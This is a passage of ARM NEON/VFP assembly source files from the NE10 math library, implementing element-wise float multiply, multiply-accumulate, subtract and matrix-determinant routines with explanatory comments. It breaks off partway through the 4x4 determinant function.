@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mul.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mul_float_asm
.thumb
.thumb_func
ne10_mul_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mul_float(arm_vec2f_t * dst,
@                 arm_float_t * src1, const arm_float_t * src2,
@                 unsigned int count)
@
@ Element-wise product: dst[i] = src1[i] * src2[i] for i in [0, count).
@
@ r0: *dst  - advanced one float per iteration via post-increment
@ r1: *src1 - advanced one float per iteration via post-increment
@ r2: *src2 - advanced one float per iteration via post-increment
@ r3: count, reused as the loop counter (counts down to zero)
@
@ Only caller-saved registers (r0-r3, s1/s2/s10) are touched, so no
@ stack frame is needed.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r3, .LoopEndFloat @ nothing to do for count == 0
.LoopBeginFloat:
vldmia r1!, {s1} @ s1 = *src1++   (load + pointer bump in one insn)
vldmia r2!, {s2} @ s2 = *src2++
vmul.f32 s10, s1, s2 @ s10 = s1 * s2
vstmia r0!, {s10} @ *dst++ = s10
subs r3, r3, #1 @ --count, setting flags
bne .LoopBeginFloat @ keep going while count != 0
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 18,658 | modules/math/NE10_mla.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_mla.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_mla_float_neon
.thumb
.thumb_func
ne10_mla_float_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_mla_float(arm_float_t * dst,
@                 arm_float_t * acc,
@                 arm_float_t * src1,
@                 arm_float_t * src2,
@                 unsigned int count)
@
@ dst[i] = acc[i] + src1[i] * src2[i]
@
@ r0: *dst  & current dst entry's address
@ r1: *acc  & current acc entry's address
@ r2: *src1 & current src1 entry's address
@ r3: *src2 & current src2 entry's address
@ r4: int count & the number of items in the input array that can be
@                 processed in chunks of 4 vectors
@
@ r5: the number of items that are left to be processed at the end of
@                 the input array
@
@ The main loop is software-pipelined: each iteration stores the
@ result computed by the previous one while loading/computing the
@ next 4-float chunk, then a scalar loop handles the count % 4 tail.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
ldr r4, [r13, #8] @ r4 = count; r13 is the stack pointer (sp); #8 skips the two pushed registers
and r5, r4, #3 @ r5 = count % 4; This is what's left to be processed after this loop
sub r4, r4, r5 @ count = count - r5
cbz r4, .L_check_float
@ load the 1st set of values
vld1.32 {q0}, [r2]!
vld1.32 {q1}, [r3]!
vld1.32 {q3}, [r1]!
subs r4, r4, #4
@ calculate values for the 1st set
vmla.f32 q3, q0, q1 @ q3 += q0 * q1
ble .L_mainloopend_float
.L_mainloop_float:
@ load the next (e.g. 2nd) set of values, leave loading acc until later
vld1.32 {q0}, [r2]!
vld1.32 {q1}, [r3]!
@ store the result for the 1st/next (e.g. 2nd) set
vst1.32 {d6,d7}, [r0]!
@ load the next (e.g. 2nd) acc, and decrease the counter
vld1.32 {q3}, [r1]!
subs r4, r4, #4
@ calculate values for the next (e.g. 2nd) set
vmla.f32 q3, q0, q1 @ q3 += q0 * q1
bgt .L_mainloop_float @ loop if r4 > 0, if we have at least another 4 floats
.L_mainloopend_float:
@ the last iteration for this call
@ store the result for the last set of values (e.g 2nd set)
vst1.32 {d6,d7}, [r0]!
.L_check_float:
@ check if anything left to process at the end of the input array
cmp r5, #0
ble .L_return_float
.L_secondloop_float:
@ process the last few items left in the input array, one float at a time
vld1.f32 d0[0], [r2]! @ Fill in d0[0]
vld1.f32 d1[0], [r3]! @ Fill in d1[0]
vld1.f32 d2[0], [r1]! @ Fill in d2[0]
subs r5, r5, #1
@ values (full-d multiply-accumulate, but only lane 0 is stored below)
vmla.f32 d2, d0, d1
vst1.32 {d2[0]}, [r0]!
bgt .L_secondloop_float
.L_return_float:
@ return NE10_OK (0)
pop {r4, r5}
mov r0, #0
bx lr
.balign 4
.global ne10_vmla_vec2f_neon
.thumb
.thumb_func
ne10_vmla_vec2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_vmla_vec2f(arm_vec2f_t * dst,
@                 arm_vec2f_t * acc,
@                 arm_vec2f_t * src1,
@                 arm_vec2f_t * src2,
@                 unsigned int count)
@
@ dst[i] = acc[i] + src1[i] * src2[i], element-wise on 2D vectors.
@
@ r0: *dst  & current dst entry's address
@ r1: *acc  & current acc entry's address
@ r2: *src1 & current src1 entry's address
@ r3: *src2 & current src2 entry's address
@ r4: int count & the number of items in the input array that can be
@                 processed in chunks of 4 vectors
@
@ r5: the number of items that are left to be processed at the end of
@                 the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
ldr r4, [r13, #8] @ r4 = count; r13 is the stack pointer (sp)
and r5, r4, #3 @ r5 = count % 4;
sub r4, r4, r5 @ count = count - r5; This is what's left to be processed after this loop
cbz r4, .L_check_vec2
@ load the 1st set of values; vld2 de-interleaves x components into
@ q0/q2/q8 and y components into q1/q3/q9
vld2.32 {q0-q1}, [r2]!
vld2.32 {q2-q3}, [r3]!
vld2.32 {q8-q9}, [r1]!
subs r4, r4, #4
@ calculate values for the 1st set
vmla.f32 q8, q0, q2
vmla.f32 q9, q1, q3
ble .L_mainloopend_vec2
.L_mainloop_vec2:
@ load the 2nd set of values
vld2.32 {q0-q1}, [r2]!
vld2.32 {q2-q3}, [r3]!
@ store the result for the 1st/next (e.g. 2nd) set
vst2.32 {d16,d17,d18,d19}, [r0]!
@ load the next (e.g. 2nd) set of values
vld2.32 {q8-q9}, [r1]!
subs r4, r4, #4
@ calculate values for the 2nd set
vmla.f32 q8, q0, q2
vmla.f32 q9, q1, q3
bgt .L_mainloop_vec2 @ loop if r4 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_vec2:
@ the last iteration for this call
@ store the result for the last set of values
vst2.32 {d16,d17,d18,d19}, [r0]!
.L_check_vec2:
@ check if anything left to process at the end of the input array
cmp r5, #0
ble .L_return_vec2
.L_secondloop_vec2:
@ process the last few items left in the input array, one vec2 (two
@ floats = one d register) at a time
vld1.f32 d0, [r2]!
vld1.f32 d1, [r3]!
vld1.f32 d2, [r1]!
subs r5, r5, #1
@ calculate values
vmla.f32 d2, d0, d1
vst1.32 {d2}, [r0]!
bgt .L_secondloop_vec2
.L_return_vec2:
@ return NE10_OK (0)
pop {r4, r5}
mov r0, #0
bx lr
.align 2
.global ne10_vmla_vec3f_neon
.thumb
.thumb_func
ne10_vmla_vec3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_vmla_vec3f(arm_vec3f_t * dst,
@                 arm_vec3f_t * acc,
@                 arm_vec3f_t * src1,
@                 arm_vec3f_t * src2,
@                 unsigned int count)
@
@ dst[i] = acc[i] + src1[i] * src2[i], element-wise on 3D vectors.
@
@ r0: *dst  & current dst entry's address
@ r1: *acc  & current acc entry's address
@ r2: *src1 & current src1 entry's address
@ r3: *src2 & current src2 entry's address
@ r4: int count & the number of items in the input array that can be
@                 processed in chunks of 4 vectors
@
@ r5: the number of items that are left to be processed at the end of
@                 the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
ldr r4, [r13, #8] @ r4 = count; r13 is the stack pointer (sp)
and r5, r4, #3 @ r5 = count % 4;
sub r4, r4, r5 @ count = count - r5; This is what's left to be processed after this loop
cmp r4, #0
beq .L_check_vec3
@ load the 1st set of values; two vld3 loads de-interleave 4 vec3s
@ into x = q0, y = q1, z = q2 (and q9/q10/q11 for src2)
vld3.32 {d0, d2, d4}, [r2]!
vld3.32 {d1, d3, d5}, [r2]!
vld3.32 {d18, d20, d22}, [r3]!
vld3.32 {d19, d21, d23}, [r3]!
vld3.32 {d24, d26, d28}, [r1]! @ part of q12, q13, and q14
vld3.32 {d25, d27, d29}, [r1]! @ part of q12, q13, and q14
subs r4, r4, #4
@ calculate values for the 1st set
vmla.f32 q12, q0, q9
vmla.f32 q13, q1, q10
vmla.f32 q14, q2, q11
ble .L_mainloopend_vec3
.L_mainloop_vec3:
@ load the next (e.g. 2nd) set of values
vld3.32 {d0, d2, d4}, [r2]!
vld3.32 {d1, d3, d5}, [r2]!
vld3.32 {d18, d20, d22}, [r3]!
vld3.32 {d19, d21, d23}, [r3]!
@ store the result for the 1st/next (e.g. 2nd) set
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
@ finish loading ...
vld3.32 {d24, d26, d28}, [r1]! @ part of q12, q13, and q14
vld3.32 {d25, d27, d29}, [r1]! @ part of q12, q13, and q14
subs r4, r4, #4
@ calculate values for the next (e.g. 2nd) set
vmla.f32 q12, q0, q9
vmla.f32 q13, q1, q10
vmla.f32 q14, q2, q11
bgt .L_mainloop_vec3 @ loop if r4 > 0, if we have at least another 4 vectors (12 floats) to process
.L_mainloopend_vec3:
@ the last iteration for this call
@ store the result for the last set of value
vst3.32 {d24, d26, d28}, [r0]!
vst3.32 {d25, d27, d29}, [r0]!
.L_check_vec3:
@ check if anything left to process at the end of the input array
cmp r5, #0
ble .L_return_vec3
.L_secondloop_vec3:
@ process the last few items left in the input array, one vec3 at a time
vld3.f32 {d0[0], d2[0], d4[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
vld3.f32 {d1[0], d3[0], d5[0]}, [r3]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
vld3.f32 {d18[0], d20[0], d22[0]}, [r1]! @ The values are loaded like so:
@ q9  = { acc.x, -, -, - };
@ q10 = { acc.y, -, -, - };
@ q11 = { acc.z, -, -, - };
subs r5, r5, #1
@ calculate values (only lane 0 of each register is meaningful/stored)
vmla.f32 d18, d0, d1
vmla.f32 d20, d2, d3
vmla.f32 d22, d4, d5
vst3.32 {d18[0], d20[0], d22[0]}, [r0]!
bgt .L_secondloop_vec3
.L_return_vec3:
@ return NE10_OK (0)
pop {r4, r5}
mov r0, #0
bx lr
.align 2
.global ne10_vmla_vec4f_neon
.thumb
.thumb_func
ne10_vmla_vec4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_vmla_vec4f(arm_vec4f_t * dst,
@                 arm_vec4f_t * acc,
@                 arm_vec4f_t * src1,
@                 arm_vec4f_t * src2,
@                 unsigned int count)
@
@ dst[i] = acc[i] + src1[i] * src2[i], element-wise on 4D vectors.
@
@ r0: *dst  & current dst entry's address
@ r1: *acc  & current acc entry's address
@ r2: *src1 & current src1 entry's address
@ r3: *src2 & current src2 entry's address
@ r4: int count & the number of items in the input array that can be
@                 processed in chunks of 4 vectors
@
@ r5: the number of items that are left to be processed at the end of
@                 the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
push {r4, r5}
ldr r4, [r13, #8] @ r4 = count; r13 is the stack pointer (sp)
and r5, r4, #3 @ r5 = count % 4;
sub r4, r4, r5 @ count = count - r5; This is what's left to be processed after this loop
cmp r4, #0
beq .L_check_vec4
@ load the 1st set of values; two vld4 loads de-interleave 4 vec4s
@ into x = q0, y = q1, z = q2, w = q3 (and q8-q11 for src2)
vld4.32 {d0, d2, d4, d6}, [r2]!
vld4.32 {d1, d3, d5, d7}, [r2]!
vld4.32 {d16, d18, d20, d22}, [r3]!
vld4.32 {d17, d19, d21, d23}, [r3]!
vld4.32 {d24, d26, d28, d30}, [r1]! @ part of q12, q13, q14, and q15
vld4.32 {d25, d27, d29, d31}, [r1]! @ part of q12, q13, q14, and q15
subs r4, r4, #4
@ calculate values for the 1st set
vmla.f32 q12, q0, q8
vmla.f32 q13, q1, q9
vmla.f32 q14, q2, q10
vmla.f32 q15, q3, q11
ble .L_mainloopend_vec4
.L_mainloop_vec4:
@ load the next (e.g. 2nd) set of values
vld4.32 {d0, d2, d4, d6}, [r2]!
vld4.32 {d1, d3, d5, d7}, [r2]!
vld4.32 {d16, d18, d20, d22}, [r3]!
vld4.32 {d17, d19, d21, d23}, [r3]!
@ store the result for the 1st/next (e.g. 2nd) set
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
@ finish loading ....
vld4.32 {d24, d26, d28, d30}, [r1]! @ part of q12, q13, q14, and q15
vld4.32 {d25, d27, d29, d31}, [r1]! @ part of q12, q13, q14, and q15
subs r4, r4, #4
@ calculate values for the next (e.g. 2nd) set
vmla.f32 q12, q0, q8
vmla.f32 q13, q1, q9
vmla.f32 q14, q2, q10
vmla.f32 q15, q3, q11
bgt .L_mainloop_vec4 @ loop if r4 > 0, if we have at least another 4 vectors (16 floats) to process
.L_mainloopend_vec4:
@ the last iteration for this call
@ store the result for the last set of values
vst4.32 {d24, d26, d28, d30}, [r0]!
vst4.32 {d25, d27, d29, d31}, [r0]!
.L_check_vec4:
@ check if anything left to process at the end of the input array
cmp r5, #0
ble .L_return_vec4
.L_secondloop_vec4:
@ process the last few items left in the input array, one vec4 at a time
vld4.f32 {d0[0], d2[0], d4[0], d6[0]}, [r2]! @ The values are loaded like so:
@ q0 = { V1.x, -, -, - };
@ q1 = { V1.y, -, -, - };
@ q2 = { V1.z, -, -, - };
@ q3 = { V1.w, -, -, - };
vld4.f32 {d1[0], d3[0], d5[0], d7[0]}, [r3]! @ The values are loaded like so:
@ q0 = { V1.x, -, V2.x, - };
@ q1 = { V1.y, -, V2.y, - };
@ q2 = { V1.z, -, V2.z, - };
@ q3 = { V1.w, -, V2.w, - };
vld4.f32 {d24[0], d26[0], d28[0], d30[0]}, [r1]! @ The values are loaded like so:
@ q12 = { acc.x, -, -, - };
@ q13 = { acc.y, -, -, - };
@ q14 = { acc.z, -, -, - };
@ q15 = { acc.w, -, -, - };
subs r5, r5, #1
@ calculate values (only lane 0 of each register is meaningful/stored)
vmla.f32 d24, d0, d1
vmla.f32 d26, d2, d3
vmla.f32 d28, d4, d5
vmla.f32 d30, d6, d7
vst4.32 {d24[0], d26[0], d28[0], d30[0]}, [r0]!
bgt .L_secondloop_vec4
.L_return_vec4:
@ return NE10_OK (0)
pop {r4, r5}
mov r0, #0
bx lr
|
open-vela/external_Ne10 | 3,210 | modules/math/NE10_sub.asm.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_sub.asm.s
@
.text
.syntax unified
.include "NE10header.s"
.balign 4
.global ne10_sub_float_asm
.thumb
.thumb_func
ne10_sub_float_asm:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_sub_float(arm_vec2f_t * dst,
@                 arm_float_t * src1, const arm_float_t * src2,
@                 unsigned int count)
@
@ Element-wise difference: dst[i] = src1[i] - src2[i] for i in [0, count).
@
@ r0: *dst  - advanced one float per iteration via post-increment
@ r1: *src1 - advanced one float per iteration via post-increment
@ r2: *src2 - advanced one float per iteration via post-increment
@ r3: count, reused as the loop counter (counts down to zero)
@
@ Only caller-saved registers (r0-r3, s1/s2/s10) are touched, so no
@ stack frame is needed.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
cbz r3, .LoopEndFloat @ nothing to do for count == 0
.LoopBeginFloat:
vldmia r1!, {s1} @ s1 = *src1++   (load + pointer bump in one insn)
vldmia r2!, {s2} @ s2 = *src2++
vsub.f32 s10, s1, s2 @ s10 = s1 - s2
vstmia r0!, {s10} @ *dst++ = s10
subs r3, r3, #1 @ --count, setting flags
bne .LoopBeginFloat @ keep going while count != 0
.LoopEndFloat:
mov r0, NE10_OK @ Return NE10_OK
bx lr
|
open-vela/external_Ne10 | 11,419 | modules/math/NE10_detmat.neon.s | @
@ Copyright 2011-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@
@ NE10 Library : math/NE10_detmat.neon.s
@
.text
.syntax unified
.include "NE10header.s"
.include "NE10_detmat.neon.inc.s"
.align 4
.global ne10_detmat_2x2f_neon
.thumb
.thumb_func
ne10_detmat_2x2f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_detmat_2x2f(arm_float_t * dst,
@                 arm_mat2x2f_t * src,
@                 unsigned int count)
@
@ dst[i] = det(src[i]) for count 2x2 matrices.
@
@ r0: *dst & current dst entry's address
@ r1: *src & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@                 processed in chunks of 4 matrices
@
@ r3: the number of items that are left to be processed at the end
@                 of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cbz r2, .L_check_mat2x2
@ We load four 2x2 matrices each time, calculate their
@ determinants, store the results in the destination
@ memory address, and move onto the next four.
@ load the 1st set of values; vld4 de-interleaves the four matrix
@ elements into q0..q3, so det = q0*q3 - q1*q2 lane-wise
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ calculate values for current set
vmul.f32 q15, q0, q3
vmls.f32 q15, q1, q2
ble .L_mainloopend_mat2x2
.L_mainloop_mat2x2:
@ store the result for current set
vst1.32 {q15}, [r0]!
@ load the next set of values
vld4.32 {d0, d2, d4, d6}, [r1]!
vld4.32 {d1, d3, d5, d7}, [r1]!
subs r2, r2, #4
@ calculate values for next set
vmul.f32 q15, q0, q3
vmls.f32 q15, q1, q2
bgt .L_mainloop_mat2x2 @ loop if r2 > 0, if we have at least another 4 vectors (8 floats) to process
.L_mainloopend_mat2x2:
@ the last iteration for this call
@ store the result for the last set
vst1.32 {q15}, [r0]!
.L_check_mat2x2:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat2x2
.L_secondloop_mat2x2:
@ process the last few items left in the input array, one matrix at a time
vld1.32 {d0, d1}, [r1]! @ Load matrix [A]: d0 = {a, b}, d1 = {c, d}
subs r3, r3, #1
@ calculate det([A]) = |A| = a*d - b*c using a reverse/multiply trick:
vrev64.32 d1, d1 @ d1 = {d, c}
vmul.f32 d2, d0, d1 @ d2 = {a*d, b*c}
vrev64.32 d2, d2 @ d2 = {b*c, a*d}
vmls.f32 d2, d0, d1 @ At this point d2 = { -|A|, |A| }
@ store the result which is in d2[1]
vst1.32 {d2[1]}, [r0]!
bgt .L_secondloop_mat2x2
.L_return_mat2x2:
@ return NE10_OK (0)
mov r0, #0
bx lr
.align 4
.global ne10_detmat_3x3f_neon
.thumb
.thumb_func
ne10_detmat_3x3f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_detmat_3x3f(arm_float_t * dst,
@                 arm_mat3x3f_t * src,
@                 unsigned int count)
@
@ dst[i] = det(src[i]) for count 3x3 matrices.
@ LOAD_3x3MATS_ARGS / GET_DETERMINANT_of_3x3MATS_ARGS come from the
@ included NE10_detmat.neon.inc.s.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@                 processed in chunks of 4 matrices
@
@ r3: the number of items that are left to be processed at the end
@                 of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat3x3
@ We load two 3x3 matrices each time, calculate their
@ determinants, store the results in the destination
@ memory address, and move onto the next two.
@ load the 1st set of values
LOAD_3x3MATS_ARGS d0, d1, d2, d3, d4, d5, d16, d17, d18, d19, d20, d21, q0, q1, q2, q8, q9, q10, r1
subs r2, r2, #2
@ calculate values for the current set
GET_DETERMINANT_of_3x3MATS_ARGS d0, d2, d4, d16, d18, d20, d1, d3, d5, d22, d24, d26
ble .L_mainloopend_mat3x3
.L_mainloop_mat3x3:
@ store the result (two determinants in d22) for the current set
vst1.32 {d22}, [r0]!
@ load the next set of values
LOAD_3x3MATS_ARGS d0, d1, d2, d3, d4, d5, d16, d17, d18, d19, d20, d21, q0, q1, q2, q8, q9, q10, r1
subs r2, r2, #2
@ calculate values for the next set
GET_DETERMINANT_of_3x3MATS_ARGS d0, d2, d4, d16, d18, d20, d1, d3, d5, d22, d24, d26
bgt .L_mainloop_mat3x3 @ loop if r2 > 0, if we have at least another 2 matrices to process
.L_mainloopend_mat3x3:
@ the last iteration for this call
@ store the result for the last set
vst1.32 {d22}, [r0]!
.L_check_mat3x3:
@ check if anything left to process at the end of the input array
cmp r3, #0
ble .L_return_mat3x3
.L_secondloop_mat3x3:
@ process the last few items left in the input array, one matrix at a time
@ (single-lane vld3 loads place one matrix in lane 0 of each register)
vld3.32 { d0[0], d2[0], d4[0]}, [r1]!
vld3.32 { d1[0], d3[0], d5[0]}, [r1]!
vld3.32 {d16[0], d18[0], d20[0]}, [r1]!
subs r3, r3, #1
@ calculate values for the last (e.g. 3rd) set
GET_DETERMINANT_of_3x3MATS_ARGS d0, d2, d4, d1, d3, d5, d16, d18, d20, d22, d24, d26
@ store the result for the last (e.g. 3rd) set
vst1.32 {d22[0]}, [r0]!
bgt .L_secondloop_mat3x3
.L_return_mat3x3:
@ return NE10_OK (0)
mov r0, #0
bx lr
.align 4
.global ne10_detmat_4x4f_neon
.thumb
.thumb_func
ne10_detmat_4x4f_neon:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@ arm_result_t ne10_detmat_float(arm_float_t * dst,
@                 arm_mat4x4f_t * src1,
@                 unsigned int count)
@
@ dst[i] = det(src[i]) for count 4x4 matrices.
@ LOAD_4x4MATS_ARGS / GET_DETERMINANT_of_4x4MATS_ARGS come from the
@ included NE10_detmat.neon.inc.s.
@
@ r0: *dst & current dst entry's address
@ r1: *src1 & current src1 entry's address
@ r2: int count & the number of items in the input array that can be
@                 processed in chunks of 4 vectors
@
@ r3: the number of items that are left to be processed at the end
@                 of the input array
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
and r3, r2, #3 @ r3 = count % 4;
sub r2, r2, r3 @ count = count - r3; This is what's left to be processed after this loop
cmp r2, #0
beq .L_check_mat4x4
@ We load two 4x4 matrices each time, calculate their
@ determinants, store the results in the destination
@ memory address, and move onto the next two.
@ load the 1st set of values
LOAD_4x4MATS_ARGS d0, d1, d2, d3, d4, d5, d6, d7, d16, d17, d18, d19, d20, d21, d22, d23, q0, q1, q2, q3, q8, q9, q10, q11, r1
subs r2, r2, #2
@ calculate values for the current set
